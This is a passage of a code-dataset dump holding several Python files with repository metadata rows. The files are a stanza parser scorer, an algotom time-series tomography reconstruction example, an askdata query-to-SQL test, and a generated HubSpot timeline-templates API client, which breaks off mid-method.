| 32.852535 | 93 | 0.714827 |
39e559ad464e51382aa441e28dc64faf4ad42380 | 614 | py | Python | stanza/models/depparse/scorer.py | danielhers/stanza | d747a7b781da203c286ec51e3842fecb8b0abb15 | [
"Apache-2.0"
] | 3,633 | 2016-01-21T17:29:13.000Z | 2022-03-31T13:36:47.000Z | stanza/models/depparse/scorer.py | danielhers/stanza | d747a7b781da203c286ec51e3842fecb8b0abb15 | [
"Apache-2.0"
] | 593 | 2016-01-19T07:16:05.000Z | 2022-03-31T20:23:58.000Z | stanza/models/depparse/scorer.py | danielhers/stanza | d747a7b781da203c286ec51e3842fecb8b0abb15 | [
"Apache-2.0"
] | 525 | 2016-01-20T03:22:19.000Z | 2022-03-24T05:51:56.000Z | """
Utils and wrappers for scoring parsers.
"""
import logging
from stanza.models.common.utils import ud_scores
logger = logging.getLogger('stanza')
def score(system_conllu_file, gold_conllu_file, verbose=True):
    """Run the UD scorer and return the LAS (precision, recall, F1) triple.

    Args:
        system_conllu_file: path to the system-predicted CoNLL-U file.
        gold_conllu_file: path to the gold-standard CoNLL-U file.
        verbose: when True, also log LAS/MLAS/BLEX F1 percentages.
    """
    evaluation = ud_scores(gold_conllu_file, system_conllu_file)
    las = evaluation['LAS']
    precision, recall, f1 = las.precision, las.recall, las.f1
    if verbose:
        percentages = [evaluation[metric].f1 * 100 for metric in ['LAS', 'MLAS', 'BLEX']]
        logger.info("LAS\tMLAS\tBLEX")
        logger.info("{:.2f}\t{:.2f}\t{:.2f}".format(*percentages))
    return precision, recall, f1
| 26.695652 | 74 | 0.64658 |
a61970a309fff7615d387364e1d8d6d0b3e6efef | 5,725 | py | Python | examples/time_series_tomography/reconstruct_few_slices_each_frame.py | gbzan/algotom | 314f05b6a226e666a8ae4417b151d896606e7db4 | [
"Apache-2.0"
] | null | null | null | examples/time_series_tomography/reconstruct_few_slices_each_frame.py | gbzan/algotom | 314f05b6a226e666a8ae4417b151d896606e7db4 | [
"Apache-2.0"
] | null | null | null | examples/time_series_tomography/reconstruct_few_slices_each_frame.py | gbzan/algotom | 314f05b6a226e666a8ae4417b151d896606e7db4 | [
"Apache-2.0"
] | null | null | null | # ===========================================================================
# ===========================================================================
# Copyright (c) 2021 Nghia T. Vo. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===========================================================================
# Author: Nghia T. Vo
# E-mail:
# Description: Examples of how to use the Algotom package.
# ===========================================================================
"""
The following examples show how to reconstruct a few slices of each frame
in a time-series tomography data.
The code written based on datasets collected at the beamline I12-DLS which
often have 4 files for each time-series scan:
- a hdf-file contains projection-images.
- a nxs-file contains metadata of an experiment: energy, number-of-projections
per tomo, number-of-tomographs, detector-sample distance, detector
pixel-size, exposure time,...
- a hdf-file contains flat-field images.
- a hdf-file contains dark-field images.
Referring to "example_01_*.py" to know how to find key-paths and datasets
in a hdf/nxs file.
"""
import timeit
import numpy as np
import algotom.io.loadersaver as losa
import algotom.prep.correction as corr
import algotom.prep.calculation as calc
import algotom.rec.reconstruction as reco
import algotom.prep.removal as remo
import algotom.prep.filtering as filt
import algotom.util.utility as util
# ---- User-editable parameters -------------------------------------------
# Reconstruct every `step_slice`-th slice between start_slice and stop_slice;
# stop_slice == -1 means "up to the last available slice".
start_slice = 10
stop_slice = -1
step_slice = 100
output_base = "/home/user_id/reconstruction/"
proj_path = "/i12/data/projections.hdf"
flat_path = "/i12/data/flats.hdf"
dark_path = "/i12/data/darks.hdf"
metadata_path = "/i12/data/metadata.nxs"
scan_type = "continuous" # stage is freely rotated
# scan_type = "swinging" # stage is restricted to rotate back-and-forward between 0 and 180 degree.
# Provide paths (keys) to datasets in the hdf/nxs files.
hdf_key = "/entry/data/data"
angle_key = "/entry1/tomo_entry/data/rotation_angle"
num_proj_key = "/entry1/information/number_projections"
# Crop images if need to.
crop_left = 0
crop_right = 0
data = losa.load_hdf(proj_path, hdf_key) # This is an hdf-object not ndarray.
(depth, height, width) = data.shape
left = crop_left
right = width - crop_right
# Clamp the requested slice range to the detector height.
if (stop_slice == -1) or (stop_slice > height - 1):
    stop_slice = height - 1
# Load metatdata
num_proj = int(np.asarray(losa.load_hdf(metadata_path, num_proj_key)))
# Number of tomographs (time frames) stacked in the projection file.
num_tomo = depth // num_proj
angles = np.squeeze(np.asarray(losa.load_hdf(metadata_path, angle_key)))
# Sometime there's a mismatch between the number of acquired projections
# and number of angles due to technical reasons or early terminated scan.
# In such cases, we have to provide calculated angles.
if len(angles) < depth:
    if scan_type == "continuous":
        # Every frame sweeps 0 -> 180 degrees.
        list_tmp = np.linspace(0, 180.0, num_proj)
        angles = np.ndarray.flatten(np.asarray([list_tmp for i in range(num_tomo)]))
    else:
        # Swinging scan: alternate 0 -> 180 and 180 -> 0 on successive frames.
        list_tmp1 = np.linspace(0, 180.0, num_proj)
        list_tmp2 = np.linspace(180.0, 0, num_proj)
        angles = np.ndarray.flatten(np.asarray(
            [list_tmp1 if i % 2 == 0 else list_tmp2 for i in range(num_tomo)]))
else:
    angles = angles[0:depth]
time_start = timeit.default_timer()
# Load flat-field images and dark-field images, average each of them
print("1 -> Load dark-field and flat-field images, average each result")
flat_field = np.mean(losa.load_hdf(flat_path, hdf_key)[:], axis=0)
dark_field = np.mean(losa.load_hdf(dark_path, hdf_key)[:], axis=0)
# Find the center of rotation using the sinogram of the first tomograph
mid_slice = height // 2
print("2 -> Calculate the center-of-rotation...")
sinogram = corr.flat_field_correction(data[0: num_proj, mid_slice, left:right],
                                      flat_field[mid_slice, left:right],
                                      dark_field[mid_slice, left:right])
center = calc.find_center_vo(sinogram)
print("Center-of-rotation = {0}".format(center))
# Reconstruct the selected slices of every time frame, writing one folder of
# TIFFs per frame.
for i in range(num_tomo):
    folder_name = "tomo_" + ("0000" + str(i))[-5:]
    thetas = np.deg2rad(angles[i * num_proj: (i + 1) * num_proj])
    for slice_idx in range(start_slice, stop_slice + 1, step_slice):
        sinogram = corr.flat_field_correction(data[i * num_proj: (i + 1) * num_proj, slice_idx, left:right],
                                              flat_field[slice_idx, left:right],
                                              dark_field[slice_idx, left:right])
        # Pre-processing: zinger removal, ring/stripe-artifact removal, and
        # Fresnel (contrast-enhancement) filtering before reconstruction.
        sinogram = remo.remove_zinger(sinogram, 0.05, 1)
        sinogram = remo.remove_all_stripe(sinogram, 3.0, 51, 17)
        sinogram = filt.fresnel_filter(sinogram, 100)
        # img_rec = reco.dfi_reconstruction(sinogram, center, angles=thetas, apply_log=True)
        # img_rec = reco.gridrec_reconstruction(sinogram, center, angles=thetas, apply_log=True)
        img_rec = reco.fbp_reconstruction(sinogram, center, angles=thetas, apply_log=True)
        file_name = "rec_slice_" + ("0000" + str(slice_idx))[-5:] + ".tif"
        losa.save_image(output_base + "/" + folder_name + "/" + file_name, img_rec)
    print("Done tomograph {0}".format(i))
time_stop = timeit.default_timer()
print("All done!!! Total time cost: {}".format(time_stop - time_start))
1e311cf4663842248c4cc4f8d7b1fd2c6ea4f902 | 2,226 | py | Python | tests/query2sql_test.py | AskdataInc/askdata-api-python-client | 82d63e5aad68e109cafe54aab29cf98cb5587588 | [
"Apache-2.0"
] | null | null | null | tests/query2sql_test.py | AskdataInc/askdata-api-python-client | 82d63e5aad68e109cafe54aab29cf98cb5587588 | [
"Apache-2.0"
] | null | null | null | tests/query2sql_test.py | AskdataInc/askdata-api-python-client | 82d63e5aad68e109cafe54aab29cf98cb5587588 | [
"Apache-2.0"
] | null | null | null | from askdata import human2query
from askdata.smartquery import SmartQuery, Query, Field, Condition, Sorting, SQLSorting, SQLOperator, TimeOperator, \
BooleanOperator, CompositeCondition
if __name__ == "__main__":
    # Query2SQL
    # Build a SmartQuery that sums incidents per customer and acquisition
    # year, filters to two named customers acquired in 2018-2019, orders by
    # acquisition date (newest first) and keeps the top 6 rows.
    smartquery = SmartQuery(
        queries=[
            Query(
                fields=[
                    Field(aggregation="SUM", column="incidents", alias="sum_incidents",
                          internalDataType="NUMERIC",
                          sourceDataType="INT64"),
                    Field(column="customer_name", alias="Customer",
                          internalDataType="STRING",
                          sourceDataType="VARCHAR"),
                    Field(aggregation="YEAR", column="acquired", alias="Acquired Date",
                          internalDataType="DATE",
                          sourceDataType="DATE")
                ],
                where=[
                    CompositeCondition(conditions=[
                        Condition(field=Field(column="customer_name", alias="Customer",
                                              internalDataType="STRING",
                                              sourceDataType="VARCHAR"), operator=SQLOperator.IN,
                                  value=["Franceaco Doe", "Claude Rudolf"]),
                        Condition(field=Field(aggregation="YEAR", column="acquired", alias="Acquired Date",
                                              internalDataType="DATE",
                                              sourceDataType="DATE"), operator=TimeOperator.RANGE,
                                  value=["2018-01-01", "2019-12-31"])
                    ], operator=BooleanOperator.AND)
                ],
                orderBy=[
                    Sorting(field="Acquired Date", order=SQLSorting.DESC)
                ],
                limit=6
            )
        ]
    )
    # Translate the same SmartQuery three ways for the MySQL dialect:
    # full SQL statement, computed-field expressions, and filter expressions.
    response = human2query.query2sql(smartquery=smartquery, driver="MySQL")
    print(response)
    response = human2query.complex_field_calculator(smartquery=smartquery, driver="MySQL")
    print(response)
    response = human2query.complex_filter_calculator(smartquery=smartquery, driver="MySQL")
    print(response)
f9beb2e0a529e7736a66a6c3f105bb989b50d5b6 | 32,479 | py | Python | hubspot/crm/timeline/api/templates_api.py | Ronfer/hubspot-api-python | 1c87274ecbba4aa3c7728f890ccc6e77b2b6d2e4 | [
"Apache-2.0"
] | 117 | 2020-04-06T08:22:53.000Z | 2022-03-18T03:41:29.000Z | hubspot/crm/timeline/api/templates_api.py | Ronfer/hubspot-api-python | 1c87274ecbba4aa3c7728f890ccc6e77b2b6d2e4 | [
"Apache-2.0"
] | 62 | 2020-04-06T16:21:06.000Z | 2022-03-17T16:50:44.000Z | hubspot/crm/timeline/api/templates_api.py | Ronfer/hubspot-api-python | 1c87274ecbba4aa3c7728f890ccc6e77b2b6d2e4 | [
"Apache-2.0"
] | 45 | 2020-04-06T16:13:52.000Z | 2022-03-30T21:33:17.000Z | # coding: utf-8
"""
Timeline events
This feature allows an app to create and configure custom events that can show up in the timelines of certain CRM objects like contacts, companies, tickets, or deals. You'll find multiple use cases for this API in the sections below. # noqa: E501
The version of the OpenAPI document: v3
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from hubspot.crm.timeline.api_client import ApiClient
from hubspot.crm.timeline.exceptions import ApiTypeError, ApiValueError # noqa: F401
class TemplatesApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def archive(self, event_template_id, app_id, **kwargs): # noqa: E501
"""Deletes an event template for the app # noqa: E501
This will delete the event template. All associated events will be removed from search results and the timeline UI. This action can't be undone, so it's highly recommended that you stop using any associated events before deleting a template. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.archive(event_template_id, app_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str event_template_id: The event template ID. (required)
:param int app_id: The ID of the target app. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs["_return_http_data_only"] = True
return self.archive_with_http_info(event_template_id, app_id, **kwargs) # noqa: E501
    def archive_with_http_info(self, event_template_id, app_id, **kwargs): # noqa: E501
        """Deletes an event template for the app # noqa: E501
        This will delete the event template. All associated events will be removed from search results and the timeline UI. This action can't be undone, so it's highly recommended that you stop using any associated events before deleting a template. # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.archive_with_http_info(event_template_id, app_id, async_req=True)
        >>> result = thread.get()
        :param async_req bool: execute request asynchronously
        :param str event_template_id: The event template ID. (required)
        :param int app_id: The ID of the target app. (required)
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # NOTE: auto-generated by OpenAPI Generator; edit the generator
        # templates rather than this method where possible.
        # Merge the recognised transport kwargs into the locals() snapshot,
        # rejecting anything unknown.
        local_var_params = locals()
        all_params = ["event_template_id", "app_id"]
        all_params.extend(["async_req", "_return_http_data_only", "_preload_content", "_request_timeout"])
        for key, val in six.iteritems(local_var_params["kwargs"]):
            if key not in all_params:
                raise ApiTypeError("Got an unexpected keyword argument '%s'" " to method archive" % key)
            local_var_params[key] = val
        del local_var_params["kwargs"]
        # verify the required parameter 'event_template_id' is set
        if self.api_client.client_side_validation and ("event_template_id" not in local_var_params or local_var_params["event_template_id"] is None): # noqa: E501 # noqa: E501
            raise ApiValueError("Missing the required parameter `event_template_id` when calling `archive`") # noqa: E501
        # verify the required parameter 'app_id' is set
        if self.api_client.client_side_validation and ("app_id" not in local_var_params or local_var_params["app_id"] is None): # noqa: E501 # noqa: E501
            raise ApiValueError("Missing the required parameter `app_id` when calling `archive`") # noqa: E501
        collection_formats = {}
        # Substitute the two path placeholders in the endpoint template below.
        path_params = {}
        if "event_template_id" in local_var_params:
            path_params["eventTemplateId"] = local_var_params["event_template_id"] # noqa: E501
        if "app_id" in local_var_params:
            path_params["appId"] = local_var_params["app_id"] # noqa: E501
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        # HTTP header `Accept`
        header_params["Accept"] = self.api_client.select_header_accept(["*/*"]) # noqa: E501
        # Authentication setting
        auth_settings = ["developer_hapikey"] # noqa: E501
        return self.api_client.call_api(
            "/crm/v3/timeline/{appId}/event-templates/{eventTemplateId}",
            "DELETE",
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None, # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get("async_req"),
            _return_http_data_only=local_var_params.get("_return_http_data_only"), # noqa: E501
            _preload_content=local_var_params.get("_preload_content", True),
            _request_timeout=local_var_params.get("_request_timeout"),
            collection_formats=collection_formats,
        )
def create(self, app_id, timeline_event_template_create_request, **kwargs): # noqa: E501
"""Create an event template for your app # noqa: E501
Event templates define the general structure for a custom timeline event. This includes formatted copy for its heading and details, as well as any custom property definitions. The event could be something like viewing a video, registering for a webinar, or filling out a survey. A single app can define multiple event templates. Event templates will be created for contacts by default, but they can be created for companies, tickets, and deals as well. Each event template contains its own set of tokens and `Markdown` templates. These tokens can be associated with any CRM object properties via the `objectPropertyName` field to fully build out CRM objects. You must create an event template before you can create events. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create(app_id, timeline_event_template_create_request, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int app_id: The ID of the target app. (required)
:param TimelineEventTemplateCreateRequest timeline_event_template_create_request: The new event template definition. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: TimelineEventTemplate
If the method is called asynchronously,
returns the request thread.
"""
kwargs["_return_http_data_only"] = True
return self.create_with_http_info(app_id, timeline_event_template_create_request, **kwargs) # noqa: E501
    def create_with_http_info(self, app_id, timeline_event_template_create_request, **kwargs): # noqa: E501
        """Create an event template for your app # noqa: E501
        Event templates define the general structure for a custom timeline event. This includes formatted copy for its heading and details, as well as any custom property definitions. The event could be something like viewing a video, registering for a webinar, or filling out a survey. A single app can define multiple event templates. Event templates will be created for contacts by default, but they can be created for companies, tickets, and deals as well. Each event template contains its own set of tokens and `Markdown` templates. These tokens can be associated with any CRM object properties via the `objectPropertyName` field to fully build out CRM objects. You must create an event template before you can create events. # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.create_with_http_info(app_id, timeline_event_template_create_request, async_req=True)
        >>> result = thread.get()
        :param async_req bool: execute request asynchronously
        :param int app_id: The ID of the target app. (required)
        :param TimelineEventTemplateCreateRequest timeline_event_template_create_request: The new event template definition. (required)
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(TimelineEventTemplate, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # NOTE: auto-generated by OpenAPI Generator; edit the generator
        # templates rather than this method where possible.
        # Merge the recognised transport kwargs into the locals() snapshot,
        # rejecting anything unknown.
        local_var_params = locals()
        all_params = ["app_id", "timeline_event_template_create_request"]
        all_params.extend(["async_req", "_return_http_data_only", "_preload_content", "_request_timeout"])
        for key, val in six.iteritems(local_var_params["kwargs"]):
            if key not in all_params:
                raise ApiTypeError("Got an unexpected keyword argument '%s'" " to method create" % key)
            local_var_params[key] = val
        del local_var_params["kwargs"]
        # verify the required parameter 'app_id' is set
        if self.api_client.client_side_validation and ("app_id" not in local_var_params or local_var_params["app_id"] is None): # noqa: E501 # noqa: E501
            raise ApiValueError("Missing the required parameter `app_id` when calling `create`") # noqa: E501
        # verify the required parameter 'timeline_event_template_create_request' is set
        if self.api_client.client_side_validation and (
            "timeline_event_template_create_request" not in local_var_params or local_var_params["timeline_event_template_create_request"] is None # noqa: E501
        ): # noqa: E501
            raise ApiValueError("Missing the required parameter `timeline_event_template_create_request` when calling `create`") # noqa: E501
        collection_formats = {}
        path_params = {}
        if "app_id" in local_var_params:
            path_params["appId"] = local_var_params["app_id"] # noqa: E501
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        # The template definition is sent as the JSON request body.
        body_params = None
        if "timeline_event_template_create_request" in local_var_params:
            body_params = local_var_params["timeline_event_template_create_request"]
        # HTTP header `Accept`
        header_params["Accept"] = self.api_client.select_header_accept(["application/json", "*/*"]) # noqa: E501
        # HTTP header `Content-Type`
        header_params["Content-Type"] = self.api_client.select_header_content_type(["application/json"]) # noqa: E501 # noqa: E501
        # Authentication setting
        auth_settings = ["developer_hapikey"] # noqa: E501
        return self.api_client.call_api(
            "/crm/v3/timeline/{appId}/event-templates",
            "POST",
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type="TimelineEventTemplate", # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get("async_req"),
            _return_http_data_only=local_var_params.get("_return_http_data_only"), # noqa: E501
            _preload_content=local_var_params.get("_preload_content", True),
            _request_timeout=local_var_params.get("_request_timeout"),
            collection_formats=collection_formats,
        )
def get_all(self, app_id, **kwargs): # noqa: E501
"""List all event templates for your app # noqa: E501
Use this to list all event templates owned by your app. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all(app_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int app_id: The ID of the target app. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: CollectionResponseTimelineEventTemplateNoPaging
If the method is called asynchronously,
returns the request thread.
"""
kwargs["_return_http_data_only"] = True
return self.get_all_with_http_info(app_id, **kwargs) # noqa: E501
def get_all_with_http_info(self, app_id, **kwargs):  # noqa: E501
    """List all event templates for your app  # noqa: E501

    Use this to list all event templates owned by your app.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_all_with_http_info(app_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int app_id: The ID of the target app. (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: tuple(CollectionResponseTimelineEventTemplateNoPaging, status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously,
             returns the request thread.
    """
    # ``locals()`` must be captured before any other local name is
    # created so it contains exactly the declared parameters.
    params = locals()

    # Reject unknown keyword arguments, then merge the known ones in.
    accepted = ["app_id"]
    accepted.extend(["async_req", "_return_http_data_only", "_preload_content", "_request_timeout"])
    for key, val in six.iteritems(params["kwargs"]):
        if key not in accepted:
            raise ApiTypeError("Got an unexpected keyword argument '%s' to method get_all" % key)
        params[key] = val
    del params["kwargs"]

    # Client-side validation of the required path parameter.
    if self.api_client.client_side_validation and params.get("app_id") is None:  # noqa: E501
        raise ApiValueError("Missing the required parameter `app_id` when calling `get_all`")  # noqa: E501

    path_params = {}
    if "app_id" in params:
        path_params["appId"] = params["app_id"]  # noqa: E501

    header_params = {
        "Accept": self.api_client.select_header_accept(["application/json", "*/*"])  # noqa: E501
    }

    return self.api_client.call_api(
        "/crm/v3/timeline/{appId}/event-templates",
        "GET",
        path_params,
        [],  # query_params
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type="CollectionResponseTimelineEventTemplateNoPaging",  # noqa: E501
        auth_settings=["developer_hapikey"],
        async_req=params.get("async_req"),
        _return_http_data_only=params.get("_return_http_data_only"),  # noqa: E501
        _preload_content=params.get("_preload_content", True),
        _request_timeout=params.get("_request_timeout"),
        collection_formats={},
    )
def get_by_id(self, event_template_id, app_id, **kwargs):  # noqa: E501
    """Gets a specific event template for your app  # noqa: E501

    View the current state of a specific template and its tokens.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_by_id(event_template_id, app_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str event_template_id: The event template ID. (required)
    :param int app_id: The ID of the target app. (required)
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: TimelineEventTemplate
             If the method is called asynchronously,
             returns the request thread.
    """
    # Convenience wrapper: return the payload only.
    kwargs["_return_http_data_only"] = True
    return self.get_by_id_with_http_info(event_template_id, app_id, **kwargs)  # noqa: E501
def get_by_id_with_http_info(self, event_template_id, app_id, **kwargs):  # noqa: E501
    """Gets a specific event template for your app  # noqa: E501

    View the current state of a specific template and its tokens.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_by_id_with_http_info(event_template_id, app_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str event_template_id: The event template ID. (required)
    :param int app_id: The ID of the target app. (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: tuple(TimelineEventTemplate, status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously,
             returns the request thread.
    """
    # ``locals()`` must run before any other local name is created.
    params = locals()

    # Reject unknown keyword arguments, then merge the known ones in.
    accepted = ["event_template_id", "app_id"]
    accepted.extend(["async_req", "_return_http_data_only", "_preload_content", "_request_timeout"])
    for key, val in six.iteritems(params["kwargs"]):
        if key not in accepted:
            raise ApiTypeError("Got an unexpected keyword argument '%s' to method get_by_id" % key)
        params[key] = val
    del params["kwargs"]

    # Client-side validation of required path parameters.
    if self.api_client.client_side_validation and params.get("event_template_id") is None:  # noqa: E501
        raise ApiValueError("Missing the required parameter `event_template_id` when calling `get_by_id`")  # noqa: E501
    if self.api_client.client_side_validation and params.get("app_id") is None:  # noqa: E501
        raise ApiValueError("Missing the required parameter `app_id` when calling `get_by_id`")  # noqa: E501

    path_params = {}
    if "event_template_id" in params:
        path_params["eventTemplateId"] = params["event_template_id"]  # noqa: E501
    if "app_id" in params:
        path_params["appId"] = params["app_id"]  # noqa: E501

    header_params = {
        "Accept": self.api_client.select_header_accept(["application/json", "*/*"])  # noqa: E501
    }

    return self.api_client.call_api(
        "/crm/v3/timeline/{appId}/event-templates/{eventTemplateId}",
        "GET",
        path_params,
        [],  # query_params
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type="TimelineEventTemplate",  # noqa: E501
        auth_settings=["developer_hapikey"],
        async_req=params.get("async_req"),
        _return_http_data_only=params.get("_return_http_data_only"),  # noqa: E501
        _preload_content=params.get("_preload_content", True),
        _request_timeout=params.get("_request_timeout"),
        collection_formats={},
    )
def update(self, event_template_id, app_id, timeline_event_template_update_request, **kwargs):  # noqa: E501
    """Update an existing event template  # noqa: E501

    Updates an existing template and its tokens. This is primarily used to
    update the headerTemplate/detailTemplate, and those changes will take
    effect for existing events. You can also update or replace all the
    tokens in the template here instead of doing individual API calls on
    the `/tokens` endpoint.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.update(event_template_id, app_id, timeline_event_template_update_request, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str event_template_id: The event template ID. (required)
    :param int app_id: The ID of the target app. (required)
    :param TimelineEventTemplateUpdateRequest timeline_event_template_update_request: The updated event template definition. (required)
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: TimelineEventTemplate
             If the method is called asynchronously,
             returns the request thread.
    """
    # Convenience wrapper: return the payload only.
    kwargs["_return_http_data_only"] = True
    return self.update_with_http_info(event_template_id, app_id, timeline_event_template_update_request, **kwargs)  # noqa: E501
def update_with_http_info(self, event_template_id, app_id, timeline_event_template_update_request, **kwargs):  # noqa: E501
    """Update an existing event template  # noqa: E501

    Updates an existing template and its tokens. This is primarily used to
    update the headerTemplate/detailTemplate, and those changes will take
    effect for existing events. You can also update or replace all the
    tokens in the template here instead of doing individual API calls on
    the `/tokens` endpoint.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.update_with_http_info(event_template_id, app_id, timeline_event_template_update_request, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str event_template_id: The event template ID. (required)
    :param int app_id: The ID of the target app. (required)
    :param TimelineEventTemplateUpdateRequest timeline_event_template_update_request: The updated event template definition. (required)
    :param _return_http_data_only: response data without head status code
                                   and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: tuple(TimelineEventTemplate, status_code(int), headers(HTTPHeaderDict))
             If the method is called asynchronously,
             returns the request thread.
    """
    # ``locals()`` must run before any other local name is created.
    params = locals()

    # Reject unknown keyword arguments, then merge the known ones in.
    accepted = ["event_template_id", "app_id", "timeline_event_template_update_request"]
    accepted.extend(["async_req", "_return_http_data_only", "_preload_content", "_request_timeout"])
    for key, val in six.iteritems(params["kwargs"]):
        if key not in accepted:
            raise ApiTypeError("Got an unexpected keyword argument '%s' to method update" % key)
        params[key] = val
    del params["kwargs"]

    # Client-side validation of required parameters.
    if self.api_client.client_side_validation and params.get("event_template_id") is None:  # noqa: E501
        raise ApiValueError("Missing the required parameter `event_template_id` when calling `update`")  # noqa: E501
    if self.api_client.client_side_validation and params.get("app_id") is None:  # noqa: E501
        raise ApiValueError("Missing the required parameter `app_id` when calling `update`")  # noqa: E501
    if self.api_client.client_side_validation and params.get("timeline_event_template_update_request") is None:  # noqa: E501
        raise ApiValueError("Missing the required parameter `timeline_event_template_update_request` when calling `update`")  # noqa: E501

    path_params = {}
    if "event_template_id" in params:
        path_params["eventTemplateId"] = params["event_template_id"]  # noqa: E501
    if "app_id" in params:
        path_params["appId"] = params["app_id"]  # noqa: E501

    # The request body is the serialized update-request model.
    body_params = params.get("timeline_event_template_update_request")

    header_params = {
        "Accept": self.api_client.select_header_accept(["application/json", "*/*"]),  # noqa: E501
        "Content-Type": self.api_client.select_header_content_type(["application/json"]),  # noqa: E501
    }

    return self.api_client.call_api(
        "/crm/v3/timeline/{appId}/event-templates/{eventTemplateId}",
        "PUT",
        path_params,
        [],  # query_params
        header_params,
        body=body_params,
        post_params=[],
        files={},
        response_type="TimelineEventTemplate",  # noqa: E501
        auth_settings=["developer_hapikey"],
        async_req=params.get("async_req"),
